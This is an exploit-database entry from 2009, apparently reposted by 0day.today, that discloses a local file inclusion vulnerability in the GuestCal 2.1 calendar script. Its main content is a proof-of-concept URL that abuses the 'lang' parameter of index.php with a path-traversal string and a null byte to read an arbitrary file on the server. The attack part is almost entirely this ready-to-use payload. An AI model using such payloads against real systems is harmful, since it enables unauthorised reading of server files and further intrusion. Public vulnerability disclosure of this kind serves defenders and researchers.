id: 5032
date: 04/13/2009
title: GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability
author: SirGod
cves: 

================================================================
GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability
================================================================


##################################################################################
[+] GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability
[+] Discovered By SirGod
##################################################################################

[+] Download script : http://guestcal.com/de/download

[+] Local File Inclusion

 - PoC :

 http://127.0.0.1/index.php?year=2009&object=1&lang=../../../../../BOOTSECT.BAK%00

##################################################################################



#  0day.today [2023-03-22]  #